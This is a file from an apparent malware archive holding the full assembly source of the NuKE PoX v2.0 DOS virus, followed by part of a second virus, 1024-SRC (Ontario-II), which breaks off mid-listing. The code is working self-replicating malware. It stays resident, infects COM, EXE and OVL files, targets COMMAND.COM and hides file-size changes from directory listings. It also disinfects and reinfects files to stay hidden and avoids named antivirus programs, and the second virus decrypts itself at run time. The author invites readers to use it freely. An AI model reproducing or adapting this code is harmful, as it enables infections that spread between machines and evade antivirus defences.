MalwareSourceCode/MSDOS/N-Index/Virus.MSDOS.Unknown.npox-v20.asm

1454 lines
108 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;==========================================================================
; ** NuKE Pox v2.0 **
;This is VERY old code but I promised to give it out, you'll see it exactly
;like Npox v1.1 in IJ#4, The code here is VERY BADLY written, I wrote WHOLE
;procedures TWICE! so LOTS of double code, I leave it UNTOUCHED for you to
;see, and understand it! I don't care if you fuck with it, go for it!
;The method of TSR is old, method of getting the Vectors is bad, the way
;I infect EXEs ain't too hot... But hell it works! It infects overlays..
;it won't infect F-prot.exe or anything with ????SCAN.EXE like SCAN.EXE or
;TBSCAN.EXE etc... Command.com dies fast... Really neat...Play all you like
;
;And to all those that said I `Hacked' this...
; FFFFFF UU UU CCCC KK KK YY YY OOOO UU UU
; FF UU UU CC CC KK KK YY YY OO OO UU UU
; FFFF UU UU CC KKK === YY OO OO UU UU
; FF UU UU CC CC KK KK YY OO OO UU UU
; FF UUUUUU CCCC KK KK YY OOOO UUUUUU
;Just cuz you can't do it, doesn't mean I can't, anyhow my 93 viruses are
;500% better than this one...
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
;-* (c) Rock Steady, Viral Developments -*
;*- (c) NuKE Software Developement 1991, 1992 *-
;-* -*
;*- Virus: NuKE PoX Version: 2.0 *-
;-* ~~~~~~ ~~~~~~~~ -*
;*- Notes: EXE & COM & OVL Infector, TSR Virus. Dir Stealth Routine. *-
;-* Will Disinfect files that are opened, and re-infect them -*
;*- when they are closed! Executed files are disinfected then *-
;-* executed, and when terminated reinfected! -*
;*- VERY HARD to stop, it goes for your COMMAND.COM! beware! *-
;-* It is listed as a COMMON Virus due to is stealthiness! -*
;*- Bytes: 1800 Bytes *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
virus_size equ last - init_virus ;Virus size
mut1 equ 3
mut2 equ 1
mut3 equ 103h ;Offset location
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h ;COM file!
rocko proc far
start: jmp init_virus
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Virus Begins Here...
;-------------------------------------------------------------------------
init_virus: call doit_now ;Doit VirusMan...
doit_now: pop bp ;Not to Lose Track
sub bp,106h ;Set our position
push ax ;Save all the regesters
push bx
push cx
push dx
push si
push di
push bp
push es
push ds
mov ax,0abcdh ;Are we resident Already?
int 21h ;***McAfee Scan String!
cmp bx,0abcdh ;Yupe... Quit Then...
je exit_com
push cs ;Get CS=DS
pop ds
mov cx,es
mov ax,3521h ;Sometimes tend to inter-
int 21h ;cept this Interrupt...
mov word ptr cs:[int21+2][bp],es ;Save the Int
mov word ptr cs:[int21][bp],bx ;Vector Table
dec cx ;Get a new Memory block
mov es,cx ;Put it Back to ES
mov bx,es:mut1 ;Get TOM size
mov dx,virus_size ;Virus size in DX
mov cl,4 ;Shift 4 bits
shr dx,cl ;Fast way to divide by 16
add dx,4 ;add 1 more para segment
mov cx,es ;current MCB segment
sub bx,dx ;sub virus_size from TOM
inc cx ;put back right location
mov es,cx
mov ah,4ah ;Set_block
int 21h
jc exit_com
mov ah,48h ;now allocate it
dec dx ;number of para
mov bx,dx ;
int 21h
jc exit_com
dec ax ;get MCB
mov es,ax
mov cx,8h ;Made DOS the owner of MCB
mov es:mut2,cx ;put it...
sub ax,0fh ;get TOM
mov di,mut3 ;beginnig of our loc in mem
mov es,ax ;
mov si,bp ;delta pointer
add si,offset init_virus ;where to start
mov cx,virus_size
cld
repne movsb ;move us
mov ax,2521h ;Restore Int21 with ours
mov dx,offset int21_handler ;Where it starts
push es
pop ds
int 21h
exit_com: push cs
pop ds
cmp word ptr cs:[buffer][bp],5A4Dh
je exit_exe_file
mov bx,offset buffer ;Its a COM file restore
add bx,bp ;First three Bytes...
mov ax,[bx] ;Mov the Byte to AX
mov word ptr ds:[100h],ax ;First two bytes Restored
add bx,2 ;Get the next Byte
mov al,[bx] ;Move the Byte to AL
mov byte ptr ds:[102h],al ;Restore the Last of 3b
pop ds
pop es
pop bp ;Restore Regesters
pop di
pop si
pop dx
pop cx
pop bx
pop ax
mov ax,100h ;Jump Back to Beginning
push ax ;Restores our IP (a CALL
retn ;Saves them, now we changed
command db "C:\COMMAND.COM",0
exit_exe_file: mov bx,word ptr cs:[vir_cs][bp] ;fix segment loc
mov dx,cs ;
sub dx,bx
mov ax,dx
add ax,word ptr cs:[exe_cs][bp] ;add it to our segs
add dx,word ptr cs:[exe_ss][bp]
mov bx,word ptr cs:[exe_ip][bp]
mov word ptr cs:[fuck_yeah][bp],bx
mov word ptr cs:[fuck_yeah+2][bp],ax
mov ax,word ptr cs:[exe_ip][bp]
mov word ptr cs:[Rock_fix1][bp],dx
mov word ptr cs:[Rock_fix2][bp],ax
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
db 0B8h ;nothing but MOV AX,XXXX
Rock_Fix1:
dw 0
cli
mov ss,ax
db 0BCh ;nothing but MOV SP,XXXX
Rock_Fix2:
dw 0
sti
db 0EAh ;nothing but JMP XXXX:XXXX
Fuck_yeah:
dd 0
int21 dd ? ;Our Old Int21
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Dir Handler
;-------------------------------------------------------------------------
old_dir: call calldos21 ;get FCB
test al,al ;error?
jnz old_out ;nope
push ax
push bx
push es
mov ah,51h ;get PSP
int 21h
mov es,bx ;
cmp bx,es:[16h] ;
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al ;Extended FCB?
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh
cmp al,1eh
jnz not_infected
and byte ptr es:[bx+17h],0e0h ;fix secs
sub word ptr es:[bx+1dh],virus_size
sbb word ptr es:[bx+1fh],0
not_infected: pop es
pop bx
pop ax
old_out: iret
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Int 21 Handler
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
int21_handler: cmp ah,11h
je old_dir
cmp ah,12h
je old_dir
cmp ax,4b00h ;File executed
je dis_infect
cmp ah,3dh
je check_file
cmp ah,3eh
je check_file2
cmp ax,0abcdh ;Virus testing
jne int21call
mov bx,0abcdh
int21call: jmp dword ptr cs:[int21] ;Split...
check_file: jmp opening_file ;Like a Charm
check_file2: jmp closing_file
dis_infect: call disinfect ;EXE & COM okay
dont_disinfect: push dx
pushf
push cs
call int21call
pop dx
execute: push ax
push bx
push cx
push dx
push ds
push ax
push bx
push cx
push dx
push ds
push bp
push cs
pop ds
mov dx,offset command
mov bp,0abcdh
jmp command1
command_ret: pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call check_4_av
jc exit1
command1: mov ax,4300h ;Get file Attribs
call calldos21
jc exit1
test cl,1h ;Make sure there normal
jz open_file ;Okay there are
and cl,0feh ;Nope, Fix them...
mov ax,4301h ;Save them now
call calldos21
jc exit
open_file: mov ax,3D02h
call calldos21
exit1: jc exit
mov bx,ax ;BX File handler
mov ax,5700h ;Get file TIME + DATE
Call calldos21
mov al,cl
or cl,1fh ;Un mask Seconds
dec cx ;60 seconds
xor al,cl ;Is it 60 seconds?
jz exit ;File already infected
push cs
pop ds
mov word ptr ds:[old_time],cx ;Save Time
mov word ptr ds:[old_date],dx ;Save Date
mov ah,3Fh
mov cx,1Bh ;Read first 1B
mov dx,offset ds:[buffer] ;into our Buffer
call calldos21
jc exit_now ;Error Split
mov ax,4202h ;Move file pointer
xor cx,cx ;to EOF File
xor dx,dx
call calldos21
jc exit_now ;Error Split
cmp word ptr ds:[buffer],5A4Dh ;Is file an EXE?
je exe_infect ;Infect EXE file
mov cx,ax
sub cx,3 ;Set the JMP
mov word ptr ds:[jump_address+1],cx
call infect_me ;Infect!
jc exit
mov ah,40h ;Write back the
mov dx,offset jump_address
mov cx,3h
call calldos21
exit_now:
mov cx,word ptr ds:[old_time] ;Restore old time
mov dx,word ptr ds:[old_date] ;Restore Old date
mov ax,5701h
call calldos21
mov ah,3Eh
call calldos21
exit: cmp bp,0abcdh
je command2
pop ds
pop dx
pop cx
pop bx
pop ax
iret
command2: jmp command_ret
exe_infect: mov cx,word ptr cs:[buffer+20]
mov word ptr cs:[exe_ip],cx
mov cx,word ptr cs:[buffer+22]
mov word ptr cs:[exe_cs],cx
mov cx,word ptr cs:[buffer+16]
mov word ptr cs:[exe_sp],cx
mov cx,word ptr cs:[buffer+14]
mov word ptr cs:[exe_ss],cx
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
mov word ptr cs:[vir_cs],dx
push ax
push dx
call infect_me
pop dx
pop ax
mov word ptr cs:[buffer+22],dx
mov word ptr cs:[buffer+20],ax
pop dx
pop ax
jc exit
add ax,virus_size
adc dx,0
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
add ax,40h
mov word ptr cs:[buffer+14],dx
mov word ptr cs:[buffer+16],ax
pop dx
pop ax
push bx
push cx
mov cl,7
shl dx,cl
mov bx,ax
mov cl,9
shr bx,cl
add dx,bx
and ax,1FFh
jz outta_here
inc dx
outta_here: pop cx
pop bx
mov word ptr cs:[buffer+2],ax
mov word ptr cs:[buffer+4],dx
mov ah,40h
mov dx,offset ds:[buffer]
mov cx,20h
call calldos21
exit_exe: jmp exit_now
rocko endp
vir_cs dw 0
exe_ip dw 0
exe_cs dw 0
exe_sp dw 0
exe_ss dw 0
exe_sz dw 0
exe_rm dw 0
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Opening File handle AX=3D
;-------------------------------------------------------------------------
opening_file: call check_extension
jnc open_fuck2
call check_exten_exe
jnc open_fuck2
jmp dword ptr cs:[int21]
open_fuck2: push ax
mov ax,3d02h
call calldos21
jnc open_fuck1
pop ax
iret
open_fuck1: push bx
push cx
push dx
push ds
mov bx,ax
mov ax,5700h
call calldos21
mov al,cl
or cl,1fh
dec cx ;60 Seconds
xor al,cl
jnz opening_exit3
dec cx
mov word ptr cs:[old_time],cx
mov word ptr cs:[old_date],dx
mov ax,4202h ;Yes Pointer to EOF
xor cx,cx
xor dx,dx
call calldos21
mov cx,dx
mov dx,ax
push cx
push dx
sub dx,1Bh ;Get first 3 Bytes
sbb cx,0
mov ax,4200h
call calldos21
push cs
pop ds
mov ah,3fh ;Read them into Buffer
mov cx,1Bh
mov dx,offset buffer
call calldos21
xor cx,cx ;Goto Beginning of File
xor dx,dx
mov ax,4200h
call calldos21
mov ah,40h ;Write first three bytes
mov dx,offset buffer
mov cx,1Bh
cmp word ptr cs:[buffer],5A4Dh
je open_exe_jmp
mov cx,3h
open_exe_jmp: call calldos21
pop dx ;EOF - Virus_Size
pop cx ;to get ORIGINAL File size
sub dx,virus_size
sbb cx,0
mov ax,4200h
call calldos21
mov ah,40h ;Fix Bytes
xor cx,cx
call calldos21
mov cx,word ptr cs:[old_time]
mov dx,word ptr cs:[old_date]
mov ax,5701h
int 21h
mov ah,3eh ;Close File
call calldos21
opening_exit3: pop ds
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21]
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Closing File Handle INFECT it!
;-------------------------------------------------------------------------
closing_file: cmp bx,0h
je closing_bye
cmp bx,5h
ja close_cont
closing_bye: jmp dword ptr cs:[int21]
close_cont: push ax
push bx
push cx
push dx
push di
push ds
push es
push bp
push bx
mov ax,1220h
int 2fh
mov ax,1216h
mov bl,es:[di]
int 2fh
pop bx
add di,0011h
mov byte ptr es:[di-0fh],02h
add di,0017h
cmp word ptr es:[di],'OC'
jne closing_next_try
cmp byte ptr es:[di+2h],'M'
jne pre_exit
jmp closing_cunt3
closing_next_try:
cmp word ptr es:[di],'XE'
jne pre_exit
cmp byte ptr es:[di+2h],'E'
jne pre_exit
closing_cunt: cmp word ptr es:[di-8],'CS'
jnz closing_cunt1 ;SCAN
cmp word ptr es:[di-6],'NA'
jz pre_exit
closing_cunt1: cmp word ptr es:[di-8],'-F'
jnz closing_cunt2 ;F-PROT
cmp word ptr es:[di-6],'RP'
jz pre_exit
closing_cunt2: cmp word ptr es:[di-8],'LC'
jnz closing_cunt3
cmp word ptr es:[di-6],'AE' ;CLEAN
jnz closing_cunt3
pre_exit: jmp closing_nogood
closing_cunt3: mov ax,5700h
call calldos21
mov al,cl
or cl,1fh
dec cx ;60 Seconds
xor al,cl
jz closing_nogood
push cs
pop ds
mov word ptr ds:[old_time],cx
mov word ptr ds:[old_date],dx
mov ax,4200h
xor cx,cx
xor dx,dx
call calldos21
mov ah,3fh
mov cx,1Bh
mov dx,offset buffer
call calldos21
jc closing_no_good
mov ax,4202h
xor cx,cx
xor dx,dx
call calldos21
jc closing_no_good
cmp word ptr ds:[buffer],5A4Dh
je closing_exe
mov cx,ax
sub cx,3h
mov word ptr ds:[jump_address+1],cx
call infect_me
jc closing_no_good
mov ah,40h
mov dx,offset jump_address
mov cx,3h
call calldos21
closing_no_good:
mov cx,word ptr ds:[old_time]
mov dx,word ptr ds:[old_date]
mov ax,5701h
call calldos21
closing_nogood: pop bp
pop es
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21]
closing_exe: mov cx,word ptr cs:[buffer+20]
mov word ptr cs:[exe_ip],cx
mov cx,word ptr cs:[buffer+22]
mov word ptr cs:[exe_cs],cx
mov cx,word ptr cs:[buffer+16]
mov word ptr cs:[exe_sp],cx
mov cx,word ptr cs:[buffer+14]
mov word ptr cs:[exe_ss],cx
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
mov word ptr cs:[vir_cs],dx
push ax
push dx
call infect_me
pop dx
pop ax
mov word ptr cs:[buffer+22],dx
mov word ptr cs:[buffer+20],ax
pop dx
pop ax
jc closing_no_good
add ax,virus_size
adc dx,0
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
add ax,40h
mov word ptr cs:[buffer+14],dx
mov word ptr cs:[buffer+16],ax
pop dx
pop ax
push bx
push cx
mov cl,7
shl dx,cl
mov bx,ax
mov cl,9
shr bx,cl
add dx,bx
and ax,1FFh
jz close_split
inc dx
close_split: pop cx
pop bx
mov word ptr cs:[buffer+2],ax
mov word ptr cs:[buffer+4],dx
mov ah,40h
mov dx,offset ds:[buffer]
mov cx,20h
call calldos21
closing_over: jmp closing_no_good
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Infection Routine...
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
infect_me proc
mov ah,40h
mov dx,offset init_virus
mov cx,virus_size
call calldos21
jc exit_error ;Error Split
mov ax,4200h
xor cx,cx ;Pointer back to
xor dx,dx ;top of file
call calldos21
jc exit_error ;Split Dude...
clc ;Clear carry flag
ret
exit_error:
stc ;Set carry flag
ret
infect_me endp
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; DisInfection Routine for 4B
;-------------------------------------------------------------------------
Disinfect PROC
push ax
push bx ;Save them
push cx
push dx
push ds
mov ax,4300h ;Get file Attribs
call calldos21
test cl,1h ;Test for Normal Attribs
jz okay_dis ;Yes, File can be opened
and cl,0feh ;No, Set them to Normal
mov ax,4301h ;Save attribs to file
call calldos21
jc half_way
okay_dis: mov ax,3d02h ;File now can be opened
call calldos21 ;Safely
jc half_way
mov bx,ax ;Put File Handle in BX
mov ax,5700h ;Get File Time & Date
call calldos21
mov al,cl ;Check to see if infected
or cl,1fh ;Unmask Seconds
dec cx ;Test to see if 60 seconds
xor al,cl
jnz half_way ;No, Quit File AIN'T
dec cx
mov word ptr cs:[old_time],cx
mov word ptr cs:[old_date],dx
mov ax,4202h ;Yes, file is infected
xor cx,cx ;Goto the End of File
xor dx,dx
call calldos21
push cs
pop ds
mov cx,dx ;Save Location into
mov dx,ax ;CX:DX
push cx ;Push them for later use
push dx
sub dx,1Bh ;Subtract file 1Bh from the
sbb cx,0 ;End so you will find the
mov ax,4200h ;Original EXE header or
call calldos21 ;First 3 bytes for COMs
mov ah,3fh ;Read them into Buffer
mov cx,1Bh ;Read all of the 1B bytes
mov dx,offset buffer ;Put them into our buffer
call calldos21
jmp half
half_way: jmp end_dis
half: xor cx,cx ;
xor dx,dx ;Goto the BEGINNING of file
mov ax,4200h
call calldos21
mov ah,40h ;Write first three bytes
mov dx,offset buffer ;from buffer to COM
mov cx,1Bh
cmp word ptr cs:[buffer],5A4Dh
je dis_exe_jmp
mov cx,3h
dis_exe_jmp: call calldos21
pop dx ;Restore CX:DX which they
pop cx ;to the End of FILE
sub dx,virus_size ;Remove Virus From the END
sbb cx,0 ;of the Orignal File
mov ax,4200h ;Get new EOF
call calldos21
mov ah,40h ;Write new EOF to File
xor cx,cx
call calldos21
mov cx,word ptr cs:[old_time]
mov dx,word ptr cs:[old_date]
mov ax,5701h
call calldos21
mov ah,3eh ;Close File
call calldos21
end_dis: pop ds
pop dx
pop cx ;Restore 'em
pop bx
pop ax
ret
disinfect ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Check File Extension DS:DX ASCIIZ
;--------------------------------------------------------------------------
Check_extension PROC
push si
push cx
mov si,dx
mov cx,256h
loop_me: cmp byte ptr ds:[si],2eh
je next_ok
inc si
loop loop_me
next_ok: cmp word ptr ds:[si+1],'OC'
jne next_1
cmp byte ptr ds:[si+3],'M'
je good_file
next_1: cmp word ptr ds:[si+1],'oc'
jne next_2
cmp byte ptr ds:[si+3],'m'
je good_file
next_2: pop cx
pop si
stc
ret
good_file: pop cx
pop si
clc
ret
Check_extension ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Check File Extension DS:DX ASCIIZ
;-------------------------------------------------------------------------
Check_exten_exe PROC
push si
push cx
mov si,dx
mov cx,256h
loop_me_exe: cmp byte ptr ds:[si],2eh
je next_ok_exe
inc si
loop loop_me_exe
next_ok_exe: cmp word ptr ds:[si+1],'XE'
jne next_1_exe
cmp byte ptr ds:[si+3],'E'
je good_file_exe
next_1_exe: cmp word ptr ds:[si+1],'xe'
jne next_2_exe
cmp byte ptr ds:[si+3],'e'
je good_file_exe
next_2_exe: pop cx
pop si
stc
ret
good_file_exe: pop cx
pop si
clc
ret
Check_exten_exe ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Call Int_21h Okay
;-------------------------------------------------------------------------
calldos21 PROC
pushf
call dword ptr cs:[int21]
retn
calldos21 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; MultiPly
;--------------------------------------------------------------------------
multiply PROC
push bx
push cx
mov cl,0Ch
shl dx,cl
xchg bx,ax
mov cl,4
shr bx,cl
and ax,0Fh
add dx,bx
pop cx
pop bx
retn
multiply ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Check for AV file... Like SCAN.EXE or F-PROT.EXE
;-------------------------------------------------------------------------
Check_4_av PROC
push si
push cx
mov si,dx
mov cx,256h
av: cmp byte ptr ds:[si],2eh
je av1
inc si
loop av
av1: cmp word ptr ds:[si-2],'NA'
jnz av2
cmp word ptr ds:[si-4],'CS'
jz fuck_av
av2: cmp word ptr ds:[si-2],'NA'
jnz av3
cmp word ptr ds:[si-4],'EL'
jz fuck_av
av3: cmp word ptr ds:[si-2],'TO'
jnz not_av
cmp word ptr ds:[si-4],'RP'
jz fuck_av
not_av: pop cx
pop si
clc
ret
fuck_av: pop cx
pop si
stc
ret
Check_4_av ENDP
msg db "NuKE PoX V2.0 - Rock Steady"
old_time dw 0
old_date dw 0
file_handle dw 0
jump_address db 0E9h,90h,90h
buffer db 90h,0CDh,020h ;\
db 18h DUP (00) ;-Make 1Bh Bytes
last:
seg_a ends
end start
;==========================================================================
;=========================================================================
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; 1024-SRC Virus (Ontario-II) by Death Angel
; ========
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;This VIRUS was only written as an experiment to see how far a computer
;virus could go through development. This pariticular virus in its present
;form WILL NOT do any damage to your data or go off bouncing a ball across
;your screen or play Yankee Doddle, IT WILL ONLY infect programs.
;
; Virus Information:
; Hides: In upper RAM, requires 3K of memory.
; Size: 1K (exactly when attached to either EXE or COM files)
; ID: Seconds in date of file is set to 32 (impossible value)
; .COM files, the 4th byte is 'O'
; .EXE files, the stack pointer is 0600h
;
; Cover-Up: If loaded with DEBUG, it will remove itself from memory.
; When doing a DIR, it will cover up the filesize increase.
;
;Notes: Also infects on a file open if the file ends in COM,EXE or OVL
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Stack_Size Equ 512+1
Code Segment Para Public 'CODE'
Assume Cs:Code, Ds:Code
Org 0000h
Jmpfar Macro addr
db 0EAh
dd addr
Endm
Callfar Macro addr
db 09Ah
dd addr
Endm
Retfar Macro num
db 0CAh
dw num
Endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Do a loop to decode the rest of the virus.
Virus_Begin:
V00: Mov Bx, offset V05-V05_Back
V04: Mov Cx, offset Start_Code-(offset V05-V05_Back)
V01: Mov Al, 00h
V02: Add Byte ptr Cs:[Bx], Al
V03: Xor Al, 00h
Inc Bx
Loop V02
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
V05_Back Equ 0
V05: Sub Bx, offset Start_Code
Xchg Ax, Cx
Dec Ax
Int 21h
Or Al, Ah
Je Run_Prog
Push Ds
Xor Di, Di
Mov Ds, Di
Lds Ax, Dword ptr Ds:[21h*4]
Mov Word ptr Cs:[Bx].Saved_21, Ax
Mov Word ptr Cs:[Bx].Saved_21+2, Ds
Mov Cx, Es
Dec Cx
Mov Ds, Cx
Sub Word ptr Ds:[Di+03h], 3072/16
Mov Ax, Word ptr Ds:[Di+12h]
Sub Ax, 3072/16
Mov Word ptr Ds:[Di+12h], Ax
Mov Es, Ax
Sub Ax, 1000h
Mov Word ptr Cs:[Bx+Dos_Seg-2], Ax
Push Cs
Pop Ds
Mov Si, Bx
Mov Cx, offset Start_Code
Cld
Rep Movsb
Mov Ds, Cx
Cli
Mov Word ptr Ds:[21h*4], offset New_21
Mov Word ptr Ds:[21H*4]+2, Es
Sti
Mov Ax, 4BFFh
Push Bx
Int 21h
Pop Bx
Pop Ds
Push Ds
Pop Es
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Run_Prog:
Lea Si, [Bx].Start_Code
Mov Di, 0100h
Cmp Bx, Di
Jb Run_Exe
Run_COM:
Push Di
Movsw
Movsw
Ret
Run_EXE:
Mov Ax, Es
Add Ax, 0010h
Add Word ptr Cs:[Si+02], Ax
Add Word ptr Cs:[Si+04], Ax
Cli
Mov Sp, Word ptr Cs:[Si+06]
Mov Ss, Word ptr Cs:[Si+04]
Sti
Jmp Dword ptr Cs:[Si+00]
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Check_Present:
Inc Ax
Iret
New_21: Cmp Ax, 0FFFFh ; Checking if resident ?
Je Check_Present
Cmp Ah, 4Bh ; Executing a program ?
Je Load_Program
Cmp Ah, 11h ; Doing a DIR ?
Je Find_First
Cmp Ah, 12h ; Doing a DIR ?
Je Find_Next
Cmp Ax, 3D00h ; Opening a file ?
Jne Run_21
Call Open_File
Run_21:
Jmpfar 0 ; Goto vector 21h
Saved_21 Equ $-4
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Find_First:
Find_Next:
Push Bp
Mov Bp, Sp
Cmp Word ptr [Bp+04], 1234h
Dos_Seg:
Pop Bp
Jb Run_21
Call Do_21
Call Save_Regs
Mov Ah, 2Fh
Call Do_21
Cmp Byte ptr Es:[Bx], 0FFh
Je F20
Sub Bx, +7
F20: Mov Al, Byte ptr Es:[Bx].1Eh
And Al, 1Fh
Cmp Al, 1Fh
Jne F00
Mov Dx, Word ptr Es:[Bx].26h
Mov Ax, Word ptr Es:[Bx].24h
Sub Ax, offset Virus_End
Sbb Dx, +00
Or Dx, Dx
Jb F00
Mov Word ptr Es:[Bx].26h, Dx
Mov Word ptr Es:[Bx].24h, Ax
F00: Call Restore_Regs
IRet
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Load_Program:
Cmp Al, 01h
Je Disinfect_DEBUG
Cmp Al, 0FFh
Je Infect_COMSPEC
Call Infect_File
Jmp Run_21
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Infect_COMMAND:
Push Dx
Push Ds
Mov Dx, offset Command_File
Push Cs
Pop Ds
Mov Byte ptr Ds:Command_Flag, 0FFh
Call Infect_File
Pop Ds
Pop Dx
Iret
Infect_COMSPEC:
Mov Ah, 51h
Call Do_21
Mov Es, Bx
Mov Ds, Es:[002Ch]
Xor Si, Si
Push Cs
Pop Es
LP00: Mov Di, offset COMSPEC_name
Mov Cx, 0004h
Rep Cmpsw
Jcxz LP20
LP10: Lodsb
Or Al, Al
Jne LP10
; Cmp Al, Byte ptr [Si]
Cmp Byte ptr [Si], 00
Jne LP00
Jmp Infect_COMMAND
LP20: Mov Dx, Si
Mov Byte ptr Cs:Command_Flag, 0FFh
Call Infect_File
IRet
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Disinfect_DEBUG:
Push Es
Push Bx
Call Do_21
Pop Bx
Pop Es
Call Save_Regs
Jb LP30
Xor Cx, Cx
Lds Si, Dword ptr Es:[Bx].12h
Push Ds
Push Si
Mov Di, 0100h
Cmp Si, Di
Jl DI00
Ja LP31
Lodsb
Cmp Al, 0E9h
Jne LP31
Lodsw
Push Ax
Lodsb
Cmp Al, 'O'
Pop Si
Jne LP31
Add Si, 103h
Inc Cx
Inc Cx
Pop Ax
Push Si
Push Ds
Pop Es
Jmp short DI10
DI00: Lea Di, Dword ptr [Bx].0Eh
Cmp Word ptr Es:[Di].00h, offset Virus_End+Stack_Size-2
Jne LP31 ; Note 4B01/decrements stack by 2
DI10: Lodsb
Cmp Al, 0BBh
Jne LP31
Lodsw
Push Ax
Lodsw
Cmp Ax, Word ptr Cs:[V04]
Pop Si
Jne LP31
Add Si, offset Start_Code-(offset V05-V05_Back)
Jcxz DI15
Rep Movsw
Jmp short DI25
DI15: Mov Ah, 51h
Call Do_21
Add Bx, 0010h
Mov Ax, [Si+06h]
Dec Ax
Dec Ax
Stosw
Mov Ax, [Si+04h]
Add Ax, Bx
Stosw
Movsw
Lodsw
Add Ax, Bx
Stosw
DI25: Pop Di
Pop Es
Xchg Cx, Ax
Mov Cx, offset Virus_End
Rep Stosb
Jmp short LP32
LP31: Pop Ax
Pop Ax
LP32: Xor Ax, Ax
Clc
LP30: Call Restore_Regs
Retfar 0002h
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Open_File Proc Near
Call Save_Regs
Mov Si, Dx
OF00: Lodsb
Or Al, Al
Je OF50
Cmp Al, '.'
Jne OF00
Mov Di, offset File_Exts-3
Push Cs
Pop Es
Mov Cx, 0003h
OF10: Push Cx
Push Si
Mov Cl, 03h
Add Di, Cx
Push Di
OF12: Lodsb
And Al, 5Fh
Cmp Al, Byte ptr Es:[Di]
Jne OF15
Inc Di
Loop OF12
Call Infect_File
Add Sp, +6
Jmp short OF50
OF15: Pop Di
Pop Si
Pop Cx
Loop OF10
OF50: Call Restore_Regs
Ret
Open_File Endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
